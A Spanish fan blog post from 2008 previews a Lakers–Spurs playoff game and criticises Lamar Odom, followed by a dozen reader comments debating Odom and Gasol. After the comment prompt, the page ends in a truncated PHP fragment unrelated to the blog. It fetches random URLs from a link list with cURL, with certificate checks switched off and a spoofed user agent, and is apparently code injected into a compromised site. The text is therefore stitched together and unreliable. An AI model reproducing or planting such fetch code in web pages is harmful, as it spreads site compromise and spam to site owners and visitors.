Diario laker: presentación y día de partido

27 de May de 2008 por MagicJohnson32

Pensamientos desde el 1.111 de South Figueroa Street, antiguo 3.900 de West Manchester Boulevard.

No voy a engañar a nadie: este espacio, de periodicidad indeterminada, será por y para Lakers fans (y para aquellos a quienes no les importe observar el mundo a través del prisma purple & gold). No trataré de barnizar de objetividad, ni datos, ni hechos consumados, aquello que aquí exprese. Lo único que trataré de reproducir fielmente será la opinión y sentimiento de un aficionado de los Lakers antes y después de cada partido o ante las diferentes noticias que se produzcan en torno a la franquicia.

Día de partido: Lakers @ Spurs (3:00 horas, en directo por D+)

Y como hoy es día de partido, no me entretendré más: A las 3:00 jugamos en San Antonio el cuarto encuentro de las Finales de Conferencia, como todos ya sabréis. Y, como ya sabréis, la eliminatoria está 2-1 para Lakers después de que los tres primeros partidos se hayan saldado con victorias locales. Tras elspursattcenter espanto del domingo, hoy es el día de demostrar que podemos ganar en el AT&T Center. Ya no digo ganar, sino demostrar a los Spurs y a nosotros mismos que podemos hacerlo. El 6º partido de la eliminatoria contra los Jazz se ganó, en gran medida, porque en las dos derrotas sufridas previamente en Salt Lake City hubo opciones de victoria. Los Spurs ya saben que pueden ganar en L.A. (aunque también saben que ganar por 20 a los Lakers a mitad del tercer cuarto no les garantiza la victoria) y sería muy negativo que la eliminatoria regresara al Staples con un 2-2 y la sensación de que los Lakers no podrán sacar nada en Texas. Pese a que hemos ganado los siete partidos disputados en casa durante estos Playoffs, el Staples Center no es precisamente una olla a presión y los Lakers son, de lejos, el equipo con peor balance como local en la regular season de entre los cuatro supervivientes.

En contraste, claro, hemos sido muy competitivos a domicilio, y hoy sería un momento muy adecuado para volver a serlo. Preveo un partido intenso y equilibrado esta noche. Para ello hace falta que Kobe Bryant no juegue solo. Porque es el MVP y lo está demostrando prácticamente cada día. Pero el domingo no hubo rastro de Gasol, ni de Fisher, ni del banquillo (salvaremos a Farmar, sobre todo en comparación con lo que venía haciendo) ni de Odom (del que hablaré con más detenimiento un poco más abajo). Espero, al menos, una mejor disposición por parte de todos ellos, que suelen ser el termómetro de estos Lakers y tras su lamentable actuación del domingo han de salir muy motivados. Con Kobe ya contamos y dudo que ahora falle. Pienso, eso sí, que le vamos a ver más agresivo de cara al aro, penetrando más y tratando de forzar faltas. Lograr puntos fáciles es esencial en pistas como el AT&T y no es normal lo poco que está yéndose Kobe a la línea en lo que llevamos de eliminatoria. No creo que Phil Jackson y el propio Bryant pasen por alto este detalle.

Odom vs Odomodompaubench

Posiblemente no sea el mejor tema para inaugurar la sección pero allá voy: Lamar Odom es desesperante. Eso sucede con aquellos jugadores que con cierta frecuencia se acercan a la excelencia y raramente la alcanzan. Odom es, en ocasiones, un jugador maravilloso. Contra los Warriors, hará dos meses, o un par de semanas después contra los Mavericks, protagonizó actuaciones deslumbrantes. Hay pocos jugadores en la liga capaces de alcanzar ese nivel de juego. Pero tampoco abundan casos de talento tan desaprovechado. Odom se enfrasca a veces en batallas contra sí mismo, se empeña en tomar decisiones equivocadas, en recurrir a penetraciones por su izquierda (donde el rival lo espera consciente de que prácticamente nunca emplea la derecha para finalizar) y en protestar a los árbitros. Y acaba desapareciendo del partido. Finalizado cada uno de esos encuentros, ya en frío, Odom se presenta ante la prensa y dice aquello de “asumo la culpa de esta derrota”, “he de ser más agresivo en ataque”, “el equipo me necesita y no puedo fallarle así”, “he de ser capaz de mantener la concentración”, etcétera.

odomdunkanEs difícil manejar la frustración. Pero la frustración es un estado al que se conduce uno mismo. Seguramente ya sea tarde para eso, pero Odom debería aprender a reconducir sus frustraciones, algo que lo convertiría en un jugador mejor y más consistente. No le ha servido, por lo visto, un ejemplo que le queda muy cerca: el de Kobe Bryant, quien se plantea las posibles frustraciones como retos (un ejemplo: tras recibir su segunda sanción en pocas semanas por golpear en acción de tiro a Marko Jaric, Bryant protagonizó una racha que le convirtió en el segundo jugador de toda la historia en lograr cuatro partidos consecutivos de 50 o más puntos anotados).

Los Lakers necesitan a Odom. La llegada de Gasol le ha permitido ejercer de tercer jugador, un rol en el que se le ve más cómodo. Aun así, para un jugador de su talla, su calidad, su trascendencia en el juego y su salario, son intolerables actuaciones como las de los partidos 1 y 3 contra los Spurs. Nadie le pide, creo yo, que deslumbre en cada encuentro; sólo que no caiga en su propia trampa mental. O cumple en los próximos compromisos o es carne de traspaso.

Compromiso

O falta de él. No prometo nada pero trataré de mantener viva esta sección, especialmente en días pre y post partido. Así que mañana dispondréis, si nada lo impide, de mis pensamientos carentes de todo interés sobre el Lakers-Spurs de esta próxima madrugada.

Comenta

12 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    De entrada, aunque para mi sufrido corazoncito sería lo mejor la victoria, al contrario de lo que la mayoría de la gente piensa, no estoy de acuerdo conque hoy tenga que ser el día en el que los Lakers tengan que demostrar nada.
    Spurs no hizo nada más que llevarse paliza tras paliza en Nueva Orleans hasta llegar al 7º, estoy seguro que los Lakers estarían capacitados para hacer algo parecido en el 6º ganen hoy o pierdan de 30.
    De echo, creo que al final todo se resolverá en el 7º y, sinceramente, me parece lo más natural y lo más atractivo teniendo en cuenta la “teórica” igualdad entre los dos equipos. Dicen que a 7 gana SA seguro. Patrañas. No dudo que sean capaces de ganar pero firmaría ya jugar cualquier partido decisivo en el Staples.

    Hoy sufriremos mucho. Obviamente haremos fuerza para que ganen, pero no pensemos en el partido de hoy como algo definitivo sea como sea el resultado. No lo es.
    Sí lo será en cambio el 5º quedemos como quedemos hoy.

    Acerca de Odom, no sé si será o no carne de traspaso este verano. Si lo es, considero que sería por cuestiones meramente económicas y no técnicas. Particularmente me parece un fuera de serie e importantísimo para este esquema pero ni de lejos le tengo como alguien infalible o que lo tenga que ser por contrato. Es cierto que tiene carencias y una de ellas es mental, con todo lo que eso significa. Sin embargo, se tiende a ser injusto con él, como con otros jugadores, porque muchas de las cosas que aporta no aparecen en el box-score y tampoco es precísamente un anotador fino.
    Podemos hablar del partido malísimo del otro día… y también podríamos hablar de lo que sucede cuando él entra a canasta, porque hay jugadores que con mirarlos sacan la falta y a otros que hay que sacarles los ojos para que les piten una.
    Si Odom no puede penetrar por causas externas es lógico pensar que puede sufrir mucho. Ójala hoy no sea así.

      Citar

  2. Viva_Dirk dice:
    #2

    Me parece excesiva culpa la que le echas a Odom, cuando es por ejemplo el único que está dando la cara en el rebote, está atacando mucho el aro, para mi está siendo el mas perjudicado en lo que a faltas no pitadas se refiere y por último ha colocado 2 tapones por partido. Si le podemos reprochar su poco acierto desde la linea de tiros libres y sus casi 4 balones perdidos.

    El rendimiento de Gasol está siendo mas bajo y recibe menos palos. Que esté cogiendo 6 rebotes y no llegue a un solo tapón por encuentro está muy mal, pero que esté atrapando 0.3 rebotes ofensivos es eso, ofensivo para el aficionado ‘laker’, dejando clara su falta de intensidad. Tampoco está dando asistencias como acostumbra, en resumen es el que menos está rindiendo en relación con lo que se espera, pero los palos van para Odom.

    A Fisher supongo que da miedo criticarlo por si a la postre resulta decisivo, pero en estos 3 partidos no se si ha jugado o no.

      Citar

  3. telekoman dice:
    #3

    Creo que cargar mucho las tintas (y remarco lo de mucho) sobre que Gasol capture sólo 0,3 rebotes ofensivos no me parece justo, simplemente por que el “triangulo” hace que esté continuamente en ataque fuera de la pintura. Sólo la pisa cuando es el que se juega el tiro, y evidentemente, capturar así el rebote es bastante más complicado. El resto del tiempo está o haciendo bloqueos en la línea de tres, bien para bloquear bien para hacer un pick & roll. Sin embargo Odom está más liberado para situarse más cerca de la canasta, o con más facilidad para entrar tras los tiros de Kobe. De ahí que coja más rebotes que Gasol. Cuando vuelve Bynum veremos el roll que finalmente coge. Esto no quita para que Gasol pueda aplicarse más en el rebote, ojo.

      Citar

  4. Viva_Dirk dice:
    #4

    Entonces desde que llegó Gasol a los Lakers es la primera vez que jugamos utilizando el triangulo?

      Citar

  5. MagicJohnson32 dice:
    #5

    Viva ¿de qué le echo la culpa a Odom? Sólo de no ser capaz de evitar ciertos errores que comete compulsivamente.

    Si parece que cargo las tintas contra él es porque cada día hablaré de una cosa, un jugador o un aspecto del juego. He dedicido empezar por Odom, pero podría haber empezado por cualquier otro.

    Ya le llegará el turno a Gasol, ya.

    Y Deer, la cuestión es que no me gustaría afrontar el 5º tras dos palizas en SA, porque te queda la sensación de que como pierdas el partido, te puedes ir despidiendo.

      Citar

  6. Viva_Dirk dice:
    #6

    Le llegará el turno a Kobe? 😮

      Citar

  7. MagicJohnson32 dice:
    #7

    Claro que le llegará el turno.

    Y el diccionario no tendrá suficientes piropos 😀

      Citar

  8. TheDeerHunter dice:
    #8

    Con esa sensación hay que vivir, Magic…

    Como decía el anuncio.
    “Me gusta el miedo… porque el miedo significa que estoy cerca, que estoy preparado”

    Me da a mí que esta noche vamos a pasarlo bien

      Citar

  9. aro_pasado_no_newtoniano dice:
    #9

    Go Ira Newble go¡¡¡¡¡¡

      Citar

  10. aro_pasado_no_newtoniano dice:
    #10

    No entiendo lo de la mejor racha tras golpear por segunda vez….No sé, lo suyo hubiese sido haberse dado cabezazos contra un pilar o haber peleado contra un caimán sin armas. Pero tampoco entiendo la fiebre,,, ni lo que deben ser los auriculares del MP3 cuando el sudor empieza a meterse a mares por las orejas y carraspean en mojado.

      Citar

  11. telekoman dice:
    #11

    Hombre Viva, Gasol esta temporada ha pasado de promediar 8,8 rebotes con Memphis haciendo de 4, a promediar (durante la regular) 7,8 con Lakers haciendo de 5. Y evidentemente durante todo este tiempo el Triangulo ha estado presente. Con esto quiero decir que no es una situación nueva, lleva toda la temporada desde que Pau es amarillo. Y que creo que es el sistema el que hace que Pau esté lejos del aro.

      Citar

  12. Gallis dice:
    #12

    Hombre, yo entiendo a Viva y creo que no le falta razón…

    Lo único por lo que yo no estoy con él es porque todavía no podemos comparar el tratamiento que le damos a Gasol y a Odom, porque Gasol apenas lleva 4 meses en LA y es el abanderado, por así decirlo, de la ilusión angelina y en cambio Odom lleva una trayectoria más larga e irregular que nos hace ser pelín precavidos…si lo de fallar tiros libres (cosa que por cierto se ha criticado) o no coger demasiados rebotes ofensivos se convierte en una costumbre tan arraigada como la irregularidad de Odom, seguro que se le critica…y si este es el Odom que nos espera los próximos años, ya te digo yo que te cansaras de oír piropos hacía él…

    Y vaya, que espero ansioso el día que mi socio hable de Kobe…por lo que escriba, que será precioso y por los comentarios, que seguro que merecen, y mucho, la pena, jajajajaja…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>